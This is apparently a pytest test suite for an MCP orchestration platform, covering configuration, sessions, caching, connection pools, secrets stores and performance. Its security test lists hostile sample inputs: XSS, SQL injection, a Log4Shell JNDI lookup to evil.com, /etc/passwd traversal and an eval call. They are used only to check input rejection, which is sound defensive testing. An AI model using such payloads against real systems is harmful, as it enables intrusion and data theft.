|
|
""" |
|
|
Comprehensive Testing Suite for MCP Orchestration Platform |
|
|
Enterprise-grade testing with high coverage and real-world scenarios |
|
|
""" |
|
|
|
|
|
import asyncio |
|
|
import pytest |
|
|
import tempfile |
|
|
import json |
|
|
import os |
|
|
from unittest.mock import Mock, AsyncMock, patch, MagicMock |
|
|
from typing import Dict, Any, List |
|
|
import time |
|
|
import uuid |
|
|
import hashlib |
|
|
|
|
|
|
|
|
from mcp_orchestrator import ( |
|
|
MCPOrchestrator, ConfigManager, SessionManager, MultiLayerCache, |
|
|
ConnectionPool, ToolManager, ServerConfig, SessionInfo, |
|
|
CircuitBreakerState, ServerState |
|
|
) |
|
|
from secrets_manager import ( |
|
|
SecretsManager, LocalSecretsStore, EnvironmentSecretsStore |
|
|
) |
|
|
from gradio_interface import MCPUI |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
@pytest.fixture
def event_loop():
    """Provide a fresh event loop for each test, closed on teardown.

    NOTE: the previous docstring claimed session scope, but this fixture is
    function-scoped (no ``scope=`` argument); the description now matches
    the actual behavior.
    """
    loop = asyncio.new_event_loop()
    yield loop
    # Always close the loop so file descriptors are not leaked across tests.
    loop.close()
|
|
|
|
|
|
|
|
@pytest.fixture
def temp_dir():
    """Yield a scratch directory that is removed automatically after the test."""
    with tempfile.TemporaryDirectory() as scratch:
        yield scratch
|
|
|
|
|
|
|
|
@pytest.fixture
def sample_server_config():
    """Build a ServerConfig populated with predictable test values."""
    settings = dict(
        id="test_server",
        name="Test MCP Server",
        url="http://localhost:8000",
        auth_token="test_token",
        timeout=30,
        max_retries=3,
        max_connections=5,
    )
    return ServerConfig(**settings)
|
|
|
|
|
|
|
|
@pytest.fixture
def mock_aiohttp_session():
    """Return a Mock aiohttp-like session whose get/post/close are async."""
    fake = Mock()
    for method_name in ("get", "post", "close"):
        setattr(fake, method_name, AsyncMock())
    return fake
|
|
|
|
|
|
|
|
@pytest.fixture
def orchestrator():
    """Create an MCPOrchestrator wired to a canned in-memory config."""
    canned_config = {
        'servers': {
            'test_server': {
                'name': 'Test Server',
                'url': 'http://localhost:8000',
                'auth_token': 'test_token',
            },
        },
        'session_ttl': 3600,
        'cache_ttl': 300,
        'max_workers': 5,
    }

    # Stub out config loading so construction never touches the filesystem.
    with patch.object(ConfigManager, 'load_config', return_value=canned_config):
        instance = MCPOrchestrator()
    return instance
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestConfigManager:
    """Test configuration management functionality."""

    def test_load_from_env(self, temp_dir):
        """Environment variables are parsed into server and app settings."""
        env_vars = {
            'MCP_SERVER_TEST_SERVER_NAME': 'Test Server',
            'MCP_SERVER_TEST_SERVER_URL': 'http://localhost:8000',
            'MCP_HOST': '0.0.0.0',
            'MCP_PORT': '7860',
            'MCP_DEBUG': 'true',
        }
        os.environ.update(env_vars)
        try:
            config_manager = ConfigManager()
            config = config_manager.load_from_env()

            assert 'servers' in config
            assert 'test_server' in config['servers']
            assert config['servers']['test_server']['name'] == 'Test Server'
            assert config['host'] == '0.0.0.0'
            # String env values should be coerced to their proper types.
            assert config['port'] == 7860
            assert config['debug'] is True
        finally:
            # The original never removed these variables, leaking state into
            # every later test in the process; clean up unconditionally.
            for key in env_vars:
                os.environ.pop(key, None)

    def test_load_from_json_file(self, temp_dir):
        """A JSON config file round-trips through load_from_file."""
        config_data = {
            'app_name': 'Test App',
            'host': 'localhost',
            'port': 8080,
            'servers': {
                'test_server': {
                    'name': 'Test Server',
                    'url': 'http://localhost:8000',
                },
            },
        }

        config_file = os.path.join(temp_dir, 'config.json')
        with open(config_file, 'w') as f:
            json.dump(config_data, f)

        config_manager = ConfigManager()
        config = config_manager.load_from_file(config_file)

        assert config['app_name'] == 'Test App'
        assert config['servers']['test_server']['name'] == 'Test Server'

    def test_merge_configs(self):
        """Merging performs a deep merge across multiple dicts."""
        config1 = {'a': 1, 'b': {'x': 1}}
        config2 = {'b': {'y': 2}, 'c': 3}
        config3 = {'d': 4}

        config_manager = ConfigManager()
        merged = config_manager.merge_configs(config1, config2, config3)

        assert merged['a'] == 1
        # Nested dicts from different sources must be merged, not replaced.
        assert merged['b']['x'] == 1
        assert merged['b']['y'] == 2
        assert merged['c'] == 3
        assert merged['d'] == 4

    def test_get_nested_config(self):
        """Dotted paths resolve nested values, with a default for misses."""
        config_manager = ConfigManager()
        config_manager.config = {
            'servers': {
                'test': {
                    'url': 'http://localhost:8000',
                    'timeout': 30,
                },
            },
        }

        assert config_manager.get('servers.test.url') == 'http://localhost:8000'
        assert config_manager.get('servers.test.timeout') == 30
        assert config_manager.get('servers.test.nonexistent', 'default') == 'default'
        assert config_manager.get('nonexistent.key', 'default') == 'default'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSessionManager:
    """Test session management functionality."""

    @pytest.mark.asyncio
    async def test_create_session(self, orchestrator):
        """A new session carries the supplied metadata and zeroed counters."""
        session = await orchestrator.session_manager.create_session(
            user_id="test_user",
            ip_address="127.0.0.1",
            user_agent="Test Agent",
        )

        assert session.session_id is not None
        assert session.user_id == "test_user"
        assert session.ip_address == "127.0.0.1"
        assert session.user_agent == "Test Agent"
        assert session.total_requests == 0
        assert session.success_rate == 0.0

    @pytest.mark.asyncio
    async def test_get_session(self, orchestrator):
        """A created session can be looked up again by its id."""
        created = await orchestrator.session_manager.create_session()

        fetched = await orchestrator.session_manager.get_session(created.session_id)

        assert fetched.session_id == created.session_id
        assert fetched.user_id == created.user_id

    @pytest.mark.asyncio
    async def test_session_expiry(self, orchestrator):
        """Sessions become unavailable once their TTL elapses."""
        session = await orchestrator.session_manager.create_session()
        session.ttl_seconds = 1  # shrink TTL so the test stays fast

        # Still retrievable before the TTL runs out.
        assert await orchestrator.session_manager.get_session(session.session_id) is not None

        await asyncio.sleep(2)  # let the TTL lapse

        # Gone once expired.
        assert await orchestrator.session_manager.get_session(session.session_id) is None

    @pytest.mark.asyncio
    async def test_rate_limiting(self, orchestrator):
        """Requests past the per-session limit are rejected with a wait time."""
        session = await orchestrator.session_manager.create_session()

        allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
            session.session_id
        )
        assert allowed is True
        assert wait_time == 0.0

        # Push the counter past the limit to force a rejection.
        limiter = orchestrator.session_manager.rate_limiters[session.session_id]
        limiter['requests'] = limiter['max_requests'] + 1

        allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
            session.session_id
        )
        assert allowed is False
        assert wait_time > 0

    @pytest.mark.asyncio
    async def test_session_stats(self, orchestrator):
        """Aggregate statistics reflect the sessions created so far."""
        for _ in range(3):
            await orchestrator.session_manager.create_session()

        stats = await orchestrator.session_manager.get_session_stats()

        assert stats['total_sessions'] == 3
        assert stats['active_connections'] == 0
        assert 'avg_session_age' in stats
        assert 'rate_limited_sessions' in stats
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestMultiLayerCache:
    """Test multi-layer caching functionality."""

    @pytest.mark.asyncio
    async def test_cache_set_and_get(self):
        """A stored entry is retrievable and returns its ETag."""
        cache = MultiLayerCache(max_size=10)

        etag = await cache.set('test_key', {'data': 'test_value'}, ttl=300)
        assert etag is not None

        value, found, returned_etag = await cache.get('test_key')

        assert found is True
        assert value == {'data': 'test_value'}
        assert returned_etag == etag

    @pytest.mark.asyncio
    async def test_cache_expiry(self):
        """Entries vanish once their TTL has elapsed."""
        cache = MultiLayerCache(default_ttl=1)

        await cache.set('test_key', 'test_value', ttl=1)

        _, found, _ = await cache.get('test_key')
        assert found is True

        await asyncio.sleep(2)  # outlive the 1-second TTL

        _, found, _ = await cache.get('test_key')
        assert found is False

    @pytest.mark.asyncio
    async def test_cache_etag_support(self):
        """A matching ETag reports not-modified; a stale one returns the data."""
        cache = MultiLayerCache()

        etag = await cache.set('test_key', {'data': 'test_value'})

        value, not_modified, returned_etag = await cache.get('test_key', etag=etag)
        assert not_modified is True
        assert returned_etag == etag

        value, not_modified, returned_etag = await cache.get('test_key', etag='different_etag')
        assert not_modified is False
        assert value == {'data': 'test_value'}

    @pytest.mark.asyncio
    async def test_cache_lru_eviction(self):
        """When full, the least recently used entry is evicted first."""
        cache = MultiLayerCache(max_size=2)

        await cache.set('key1', 'value1')
        await cache.set('key2', 'value2')
        await cache.set('key3', 'value3')  # capacity is 2, so key1 is evicted

        _, found, _ = await cache.get('key1')
        assert found is False

        # The two most recent entries survive.
        for key in ('key2', 'key3'):
            _, found, _ = await cache.get(key)
            assert found is True

    @pytest.mark.asyncio
    async def test_cache_invalidation(self):
        """Pattern invalidation removes matching keys and spares the rest."""
        cache = MultiLayerCache()

        await cache.set('prefix_key1', 'value1')
        await cache.set('prefix_key2', 'value2')
        await cache.set('other_key', 'value3')

        await cache.invalidate_pattern('prefix_')

        for key in ('prefix_key1', 'prefix_key2'):
            _, found, _ = await cache.get(key)
            assert found is False

        _, found, _ = await cache.get('other_key')
        assert found is True

    def test_cache_statistics(self):
        """Hit/miss counters roll up into the reported statistics."""
        cache = MultiLayerCache()
        cache.hits = 80
        cache.misses = 20

        stats = cache.get_stats()

        assert stats['size'] == 0
        assert stats['hits'] == 80
        assert stats['misses'] == 20
        assert stats['hit_rate'] == 0.8
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestConnectionPool:
    """Test connection pool functionality."""

    @pytest.mark.asyncio
    async def test_pool_initialization(self, sample_server_config):
        """Initialization pre-creates connections and marks them available."""
        from mcp_orchestrator import MCPOrcMetrics

        pool = ConnectionPool(sample_server_config, MCPOrcMetrics())
        await pool.initialize()

        assert len(pool.pool) > 0
        assert not pool.available.empty()

    @pytest.mark.asyncio
    async def test_get_connection(self, sample_server_config):
        """A checked-out connection is tracked in the in-use set."""
        from mcp_orchestrator import MCPOrcMetrics

        pool = ConnectionPool(sample_server_config, MCPOrcMetrics())
        await pool.initialize()

        async with pool.get_connection() as conn:
            assert conn is not None
            assert conn in pool.in_use

    @pytest.mark.asyncio
    async def test_circuit_breaker(self, sample_server_config):
        """Repeated failures past the threshold trip the breaker open."""
        from mcp_orchestrator import MCPOrcMetrics

        # A low threshold trips the breaker after just a couple of failures.
        sample_server_config.circuit_breaker_threshold = 2

        pool = ConnectionPool(sample_server_config, MCPOrcMetrics())
        await pool.initialize()

        for _ in range(3):
            try:
                async with pool.get_connection():
                    raise Exception("Simulated failure")
            except Exception:
                pass  # failures are intentional; the pool should record them

        assert pool.circuit_breaker_state == CircuitBreakerState.OPEN

    @pytest.mark.asyncio
    async def test_health_check(self, sample_server_config):
        """A 200 response from the server counts as healthy."""
        from mcp_orchestrator import MCPOrcMetrics

        pool = ConnectionPool(sample_server_config, MCPOrcMetrics())
        await pool.initialize()

        with patch('aiohttp.ClientSession.get') as mock_get:
            healthy_response = Mock()
            healthy_response.status = 200
            mock_get.return_value.__aenter__ = AsyncMock(return_value=healthy_response)

            assert await pool._perform_health_check() is True
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestToolManager:
    """Test tool management functionality."""

    @pytest.mark.asyncio
    async def test_tool_schema_validation(self, orchestrator):
        """Parameters are checked against the tool's JSON schema."""
        tool_schema = {
            "name": "test_tool",
            "description": "Test tool",
            "input_schema": {
                "type": "object",
                "properties": {
                    "param1": {"type": "string", "description": "First parameter"},
                    "param2": {"type": "number", "description": "Second parameter"},
                },
                "required": ["param1"],
            },
        }

        # A complete, well-typed parameter set passes silently.
        orchestrator.tool_manager._validate_parameters(
            {"param1": "test", "param2": 123}, tool_schema
        )

        # Omitting a required parameter is rejected.
        with pytest.raises(ValueError):
            orchestrator.tool_manager._validate_parameters({"param2": 123}, tool_schema)

        # A wrongly-typed parameter is rejected.
        with pytest.raises(ValueError):
            orchestrator.tool_manager._validate_parameters(
                {"param1": "test", "param2": "not_a_number"}, tool_schema
            )

    @pytest.mark.asyncio
    async def test_tool_search(self, orchestrator):
        """Search matches tools by name text and by tags."""
        orchestrator.tools = {
            "server1": {
                "weather_tool": Mock(
                    description="Get weather information",
                    tags=["weather", "api"],
                ),
                "calculator_tool": Mock(
                    description="Perform calculations",
                    tags=["math", "calculator"],
                ),
            },
        }

        by_text = await orchestrator.tool_manager.search_tools("weather")
        assert len(by_text) > 0
        assert any("weather" in hit["tool_name"] for hit in by_text)

        by_tag = await orchestrator.tool_manager.search_tools("", tags=["weather"])
        assert len(by_tag) > 0

    @pytest.mark.asyncio
    async def test_relevance_scoring(self, orchestrator):
        """Exact name matches outrank partial matches, which outrank tag hits."""
        from mcp_orchestrator import ToolSchema

        schema = ToolSchema(
            name="weather_forecast",
            description="Get weather forecast for locations",
            tags=["weather", "forecast", "climate"],
        )

        relevance = orchestrator.tool_manager._calculate_relevance
        score_exact = relevance("weather_forecast", schema)
        score_partial = relevance("weather", schema)
        score_tag = relevance("climate", schema)

        assert score_exact > score_partial > score_tag
        assert score_exact == 1.0

    def test_tool_statistics(self, orchestrator):
        """Stats aggregate tool counts across all registered servers."""
        orchestrator.tools = {
            "server1": {"tool1": Mock(), "tool2": Mock()},
            "server2": {"tool3": Mock(), "tool4": Mock(), "tool5": Mock()},
        }

        stats = orchestrator.tool_manager.get_stats()

        assert stats["total_servers"] == 2
        assert stats["total_tools"] == 5
        assert stats["tools_per_server"] == 2.5
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSecretsManager:
    """Test secrets management functionality."""

    @pytest.mark.asyncio
    async def test_local_secrets_store(self, temp_dir):
        """Encrypted local store supports the full set/get/list/delete cycle."""
        from cryptography.fernet import Fernet

        store = LocalSecretsStore(Fernet.generate_key(), temp_dir)

        assert await store.set_secret('test_key', 'test_value', ttl=3600) is True
        assert await store.get_secret('test_key') == 'test_value'
        assert 'test_key' in await store.list_secrets()
        assert await store.delete_secret('test_key') is True
        # After deletion the secret must be unreadable.
        assert await store.get_secret('test_key') is None

    @pytest.mark.asyncio
    async def test_secrets_expiry(self, temp_dir):
        """Secrets with a TTL disappear once it elapses."""
        from cryptography.fernet import Fernet

        store = LocalSecretsStore(Fernet.generate_key(), temp_dir)

        await store.set_secret('test_key', 'test_value', ttl=1)

        assert await store.get_secret('test_key') == 'test_value'

        await asyncio.sleep(2)  # outlive the 1-second TTL

        assert await store.get_secret('test_key') is None

    @pytest.mark.asyncio
    async def test_environment_secrets_store(self):
        """Env-backed store reads, lists and deletes MCP_SECRET_* variables."""
        store = EnvironmentSecretsStore()

        os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
        try:
            assert await store.get_secret('test_key') == 'test_value'
            assert 'test_key' in await store.list_secrets()
            assert await store.delete_secret('test_key') is True
        finally:
            # The original relied solely on delete_secret for cleanup, so a
            # failed assertion left the variable set for later tests.
            os.environ.pop('MCP_SECRET_TEST_KEY', None)

    @pytest.mark.asyncio
    async def test_secrets_manager_orchestrator(self):
        """The manager facade delegates to its configured primary backend."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True,
        }
        manager = SecretsManager(config)

        os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
        try:
            assert await manager.get_secret('test_key') == 'test_value'
            assert 'test_key' in await manager.list_secrets()
        finally:
            # The original left this variable set, polluting later tests.
            os.environ.pop('MCP_SECRET_TEST_KEY', None)

    @pytest.mark.asyncio
    async def test_secrets_rotation(self):
        """Rotation moves a secret's value from the old key to the new one."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True,
        }
        manager = SecretsManager(config)

        os.environ['MCP_SECRET_OLD_KEY'] = 'old_value'
        try:
            assert await manager.rotate_secrets('old_key', 'new_key') is True

            # The value must have moved: gone from the old key, present on
            # the new one.
            assert os.getenv('MCP_SECRET_OLD_KEY') != 'old_value'
            assert os.getenv('MCP_SECRET_NEW_KEY') == 'old_value'
        finally:
            # The original left both keys behind after the test.
            os.environ.pop('MCP_SECRET_OLD_KEY', None)
            os.environ.pop('MCP_SECRET_NEW_KEY', None)

    @pytest.mark.asyncio
    async def test_health_check(self):
        """Health check reports a boolean status per configured backend."""
        config = {
            'primary_backend': 'env',
            'env_enabled': True,
        }
        manager = SecretsManager(config)

        health = await manager.health_check()
        assert 'env' in health
        assert isinstance(health['env'], bool)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestOrchestratorIntegration:
    """Test orchestrator integration scenarios."""

    @pytest.mark.asyncio
    async def test_full_workflow(self, orchestrator):
        """Registration through tool invocation succeeds end to end (mocked HTTP)."""
        discovered_tools = {
            "test_tool": {
                "name": "test_tool",
                "description": "Test tool",
                "input_schema": {
                    "type": "object",
                    "properties": {
                        "message": {"type": "string"},
                    },
                    "required": ["message"],
                },
            },
        }

        session = await orchestrator.session_manager.create_session()

        # Register a server while tool discovery is stubbed out.
        with patch.object(
            orchestrator.tool_manager,
            '_discover_tools',
            return_value=discovered_tools,
        ):
            await orchestrator.register_server(
                ServerConfig(
                    id="test_server",
                    name="Test Server",
                    url="http://localhost:8000",
                )
            )

        assert "test_server" in orchestrator.servers
        assert "test_server" in orchestrator.connection_pools

        # Invoke the tool against a fully mocked HTTP round trip.
        with patch.object(
            orchestrator.connection_pools["test_server"],
            'get_connection',
        ) as mock_get_connection:
            fake_http = AsyncMock()
            fake_response = AsyncMock()
            fake_response.json.return_value = {
                "result": {"message": "Tool executed successfully"}
            }
            fake_response.raise_for_status = Mock()
            fake_http.post.return_value.__aenter__ = AsyncMock(return_value=fake_response)
            mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=fake_http)

            result = await orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {"message": "Hello, world!"},
                session.session_id,
            )

            assert result["status"] == "success"

    @pytest.mark.asyncio
    async def test_error_handling(self, orchestrator):
        """Unknown servers and unknown sessions are rejected with ValueError."""
        with pytest.raises(ValueError):
            await orchestrator.invoke_tool(
                "non_existent_server",
                "test_tool",
                {},
                "test_session",
            )

        with pytest.raises(ValueError):
            await orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {},
                "non_existent_session",
            )

    @pytest.mark.asyncio
    async def test_concurrent_requests(self, orchestrator):
        """Several parallel invocations complete without raising."""
        sessions = [
            await orchestrator.session_manager.create_session() for _ in range(5)
        ]

        # Build one invocation coroutine per session; nothing runs until gather.
        pending = [
            orchestrator.invoke_tool(
                "test_server",
                "test_tool",
                {"request_id": idx},
                sess.session_id,
            )
            for idx, sess in enumerate(sessions)
        ]

        with patch.object(
            orchestrator.connection_pools["test_server"],
            'get_connection',
        ) as mock_get_connection:
            fake_http = AsyncMock()
            fake_response = AsyncMock()
            fake_response.json.return_value = {"result": "success"}
            fake_response.raise_for_status = Mock()
            fake_http.post.return_value.__aenter__ = AsyncMock(return_value=fake_response)
            mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=fake_http)

            # register_server itself is mocked out; the call is a no-op.
            with patch.object(orchestrator, 'register_server'):
                await orchestrator.register_server(
                    ServerConfig(
                        id="test_server",
                        name="Test Server",
                        url="http://localhost:8000",
                    )
                )

            outcomes = await asyncio.gather(*pending, return_exceptions=True)

            for outcome in outcomes:
                if isinstance(outcome, Exception):
                    pytest.fail(f"Unexpected exception: {outcome}")

    @pytest.mark.asyncio
    async def test_metrics_collection(self, orchestrator):
        """Metrics expose server, session, cache and tool statistics."""
        await orchestrator.session_manager.create_session()

        metrics = await orchestrator.get_metrics()

        for section in ("servers", "session_stats", "cache_stats", "tool_stats"):
            assert section in metrics

        assert metrics["session_stats"]["total_sessions"] >= 1

    @pytest.mark.asyncio
    async def test_graceful_shutdown(self, orchestrator):
        """Shutdown cancels every outstanding background task."""
        for _ in range(2):
            orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1)))

        await orchestrator.shutdown()

        for task in orchestrator.background_tasks:
            assert task.cancelled()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestPerformance:
    """Test performance characteristics."""

    @pytest.mark.asyncio
    async def test_cache_performance(self):
        """1000 cache sets and 1000 gets each complete in under a second."""
        cache = MultiLayerCache(max_size=1000)

        start = time.time()
        for i in range(1000):
            await cache.set(f"key_{i}", f"value_{i}")
        set_time = time.time() - start

        start = time.time()
        for i in range(1000):
            await cache.get(f"key_{i}")
        get_time = time.time() - start

        # Generous bounds: the point is catching gross regressions, not
        # micro-benchmarking.
        assert set_time < 1.0
        assert get_time < 1.0

    @pytest.mark.asyncio
    async def test_session_creation_performance(self, orchestrator):
        """100 sessions are created quickly and all remain retrievable."""
        start = time.time()
        sessions = []
        for _ in range(100):
            sessions.append(await orchestrator.session_manager.create_session())
        creation_time = time.time() - start

        assert creation_time < 1.0

        # Every created session must still be resolvable afterwards.
        for session in sessions:
            retrieved = await orchestrator.session_manager.get_session(session.session_id)
            assert retrieved is not None

    @pytest.mark.asyncio
    async def test_memory_usage(self, orchestrator):
        """Creating 1000 sessions keeps memory growth under 100 MiB."""
        # Skip gracefully when psutil is missing instead of erroring the run
        # (the original did a bare `import psutil`, which raises ImportError
        # on hosts without it).
        psutil = pytest.importorskip("psutil")

        process = psutil.Process(os.getpid())
        initial_memory = process.memory_info().rss

        sessions = []
        for _ in range(1000):
            sessions.append(await orchestrator.session_manager.create_session())

        final_memory = process.memory_info().rss
        memory_increase = final_memory - initial_memory

        # 100 MiB ceiling for 1000 sessions.
        assert memory_increase < 100 * 1024 * 1024
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSecurity:
    """Test security features."""

    @pytest.mark.asyncio
    async def test_input_sanitization(self, orchestrator):
        """Hostile payloads must be rejected or fail — never succeed silently."""
        hostile_payloads = [
            "<script>alert('xss')</script>",
            "'; DROP TABLE users; --",
            "${jndi:ldap://evil.com/a}",
            "../../../etc/passwd",
            "eval('malicious_code')",
        ]

        for payload in hostile_payloads:
            session = await orchestrator.session_manager.create_session()
            try:
                await orchestrator.invoke_tool(
                    "test_server",
                    "test_tool",
                    {"param": payload},
                    session.session_id,
                )
            except ValueError as exc:
                # Rejection should be an explicit validation failure.
                message = str(exc).lower()
                assert "validation" in message or "invalid" in message
            except Exception:
                # Other failures (e.g. unreachable server) are acceptable here.
                pass

    @pytest.mark.asyncio
    async def test_rate_limiting_security(self, orchestrator):
        """A burst of 150 requests hits the rate limiter before completing."""
        session = await orchestrator.session_manager.create_session()

        granted = 0
        rejected = 0

        for _ in range(150):
            allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
                session.session_id
            )

            if allowed:
                granted += 1
                # Record activity so the limiter's counters advance.
                await orchestrator.session_manager.update_session_activity(session.session_id)
            else:
                rejected += 1
                assert wait_time > 0

        assert granted <= 100
        assert rejected > 0

    @pytest.mark.asyncio
    async def test_session_isolation(self, orchestrator):
        """Expiring one user's session does not affect another's."""
        session1 = await orchestrator.session_manager.create_session(user_id="user1")
        session2 = await orchestrator.session_manager.create_session(user_id="user2")

        assert session1.session_id != session2.session_id

        # Force only the first session to expire.
        session1.ttl_seconds = 1
        await asyncio.sleep(2)

        assert await orchestrator.session_manager.get_session(session1.session_id) is None

        # The second user's session is untouched.
        assert await orchestrator.session_manager.get_session(session2.session_id) is not None

    def test_configuration_sensitivity(self):
        """Loading config must not log passwords, secrets or tokens."""
        config_manager = ConfigManager()

        with patch('structlog.get_logger') as mock_logger:
            config_manager.load_from_env()

            for call in mock_logger.return_value.info.call_args_list:
                positional = call[0]
                if positional:
                    logged = str(positional).lower()
                    assert 'password' not in logged
                    assert 'secret' not in logged
                    assert 'token' not in logged
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def pytest_configure(config):
    """Register the suite's custom markers with pytest."""
    marker_lines = (
        "slow: marks tests as slow (deselect with '-m \"not slow\"')",
        "integration: marks tests as integration tests",
        "performance: marks tests as performance tests",
    )
    for line in marker_lines:
        config.addinivalue_line("markers", line)
|
|
|
|
|
|
|
|
def pytest_collection_modifyitems(config, items):
    """Automatically mark tests based on their node id and keywords."""
    for item in items:
        # Integration tests live in the orchestrator-integration class.
        if "test_orchestrator_integration" in item.nodeid:
            item.add_marker(pytest.mark.integration)

        # Performance tests live in the performance class.
        if "test_performance" in item.nodeid:
            item.add_marker(pytest.mark.performance)

        # Propagate a "slow" marker from keywords or existing markers.
        has_slow_marker = any("slow" in str(mark) for mark in item.iter_markers())
        if "slow" in item.keywords or has_slow_marker:
            item.add_marker(pytest.mark.slow)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def create_test_server_config(server_id: str = "test") -> ServerConfig:
    """Create a test server configuration with a deterministic, id-derived port.

    Args:
        server_id: Identifier used to derive the name, URL port and token.

    Returns:
        A ServerConfig whose port is stable across interpreter runs.

    The original used the builtin ``hash()``, which is randomized per process
    (PYTHONHASHSEED), so the "same" test server got a different port on every
    run; an MD5 digest keeps the port reproducible for a given server_id.
    """
    digest = int(hashlib.md5(server_id.encode("utf-8")).hexdigest(), 16)
    return ServerConfig(
        id=server_id,
        name=f"Test {server_id.title()} Server",
        url=f"http://localhost:{8000 + digest % 1000}",
        auth_token=f"token_{server_id}",
        timeout=30,
        max_retries=3,
        max_connections=10
    )
|
|
|
|
|
|
|
|
def create_test_tool_schema(tool_name: str = "test_tool") -> Dict[str, Any]:
    """Create a test tool schema for *tool_name* with a message/priority contract."""
    properties = {
        "message": {
            "type": "string",
            "description": "Message to process",
            "minLength": 1,
            "maxLength": 1000
        },
        "priority": {
            "type": "integer",
            "description": "Priority level",
            "minimum": 1,
            "maximum": 10,
            "default": 5
        }
    }
    return {
        "name": tool_name,
        "description": f"Test tool {tool_name}",
        "input_schema": {
            "type": "object",
            "properties": properties,
            "required": ["message"]
        },
        "examples": [
            {"message": "Hello, world!", "priority": 1},
            {"message": "Important task", "priority": 8}
        ],
        "tags": ["test", "utility"],
        "version": "1.0.0"
    }
|
|
|
|
|
|
|
|
async def wait_for_condition(condition_func, timeout: float = 5.0, interval: float = 0.1):
    """Poll *condition_func* until it returns truthy or *timeout* elapses.

    Args:
        condition_func: Zero-argument callable; may be sync or async.
        timeout: Maximum seconds to keep polling.
        interval: Seconds to sleep between polls.

    Returns:
        True if the condition became truthy within the timeout, else False.
    """
    # Decide sync vs async once, up front — the original crammed this
    # dispatch into a single hard-to-read conditional expression.
    is_async = asyncio.iscoroutinefunction(condition_func)
    deadline = time.time() + timeout
    while time.time() < deadline:
        if is_async:
            satisfied = await condition_func()
        else:
            satisfied = condition_func()
        if satisfied:
            return True
        await asyncio.sleep(interval)
    return False
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__":
    # Running the module directly executes the whole suite with coverage
    # over the three modules under test.
    coverage_args = [
        "--cov=mcp_orchestrator",
        "--cov=secrets_manager",
        "--cov=gradio_interface",
        "--cov-report=html",
        "--cov-report=term",
    ]
    pytest.main([__file__, *coverage_args, "-v"])